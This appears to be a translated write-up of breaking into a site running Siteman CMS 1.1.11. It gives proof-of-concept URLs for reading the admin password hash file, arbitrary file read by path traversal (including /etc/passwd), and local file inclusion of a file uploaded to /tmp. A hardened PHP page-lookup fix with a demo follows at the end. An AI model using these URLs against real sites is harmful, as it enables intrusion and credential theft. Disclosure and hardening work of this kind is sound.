Yesterday I found a subsite running Siteman CMS, along with the source code. Siteman CMS is a widely used program written in PHP that uses TXT files as its database. The security of the database is certainly high, but it is used by many people outside China.

Test environment: Linux + Apache + PHP + MySQL, Siteman 1.1.11

Siteman CMS remote password hash read:

    http://XXX.COM//data/members.txt

The passwords are MD5 hashes. Once a hash has been recovered, log in to the admin backend:

    http://www.bkjia.com/admin.php

The admin backend can normally upload arbitrary files:

    http://xxx.com/admin.php?do=edfiles

This server, however, restricts directory permissions for Apache, so the file manager fails to create files; the administrator operates on files over FTP. I then found an arbitrary file read vulnerability:

    http://XXX.com/admin.php?do=edtxt&file=../../../../../../../etc/passwd

When I was stuck again, I found something fun in the code. In index.php, around line 4:

    if (isset($_GET["page"])) {
        // The substr() offset and length are missing from the source text;
        // a first-character check (0, 1) is assumed here.
        if (substr($_GET["page"], 0, 1) != ".") {
            $page = $_GET["page"];
        } else {
            $page = "index";
        }
    } else {
        $page = "index";
    }

Around line 40:

    $content = "pages/" . $page . ".php";

Around line 96:

    include_once($content);

I won't explain the local file inclusion vulnerability; you all know it. This makes things easy. Since the web server has no write permission on any of the site's directories, the TMP directory must have the permission.
Use ../ in the upload to place a file in an arbitrary directory, then use the arbitrary file read vulnerability to check whether the upload succeeded. The file uploaded successfully, and then I exploited it:

    http://XXX.COM/index.php?do=default&page=/../../../../../../../tmp/2

The .php extension does not need to be included, because around line 40 of index.php there is:

    $content = "pages/" . $page . ".php";

Summary:

1: Siteman administrator password hash read vulnerability. POC: http://XXX.COM/data/members.txt
2: Arbitrary file read vulnerability. POC: http://XXX.COM/admin.php?do=edtxt&file=../admin.php
3: Local file inclusion vulnerability. POC: http://XXX.COM/index.php?do=default&page=XXX
4: When the upload fails, please do not forget to try the TMP temporary directory and reuse
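A hardened replacement for the page lookup in index.php, shown as an added example that is not Siteman's own code. The helper name resolve_page() and the demo directory tree are assumptions; the idea is to reject anything that is not a plain page name and then confirm the canonical path still sits under pages/.

```php
<?php
// Added example, not Siteman's code. resolve_page() is a hypothetical helper.
function resolve_page($requested, string $pagesDir): string
{
    $default = $pagesDir . '/index.php';

    // 1. Strict syntax: letters, digits, "_" and "-" only, so "/", "." and
    //    NUL bytes never reach the path. Non-strings (page[]=x) are rejected.
    if (!is_string($requested)
        || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return $default;
    }

    // 2. Canonicalise and require the result to stay inside pages/
    //    (also rejects symlinks that point outside it).
    $base = realpath($pagesDir);
    $real = realpath($pagesDir . '/' . $requested . '.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $default;
    }
    return $real;
}

// Constructed demo tree: pages/ with two pages, plus 2.php outside it.
$root = realpath(sys_get_temp_dir()) . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/index.php', '<?php // index');
file_put_contents($root . '/pages/about.php', '<?php // about');
file_put_contents($root . '/2.php', '<?php // outside pages/');

// Constructed inputs: one valid page, traversal attempts, an array, no value.
$inputs = ['about', '/../2', '../2', 'about/../../2', ['x'], null];
foreach ($inputs as $input) {
    $path = resolve_page($input, $root . '/pages');
    printf("%-18s => %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        substr($path, strlen($root)));
}
// Only "about" resolves to /pages/about.php; every other input falls back
// to /pages/index.php. In index.php the call would be:
//   include_once resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
```

Restricting what index.php will include does not remove the need to protect data/members.txt from direct web access or to validate the file parameter of admin.php?do=edtxt, which are separate issues in the summary above.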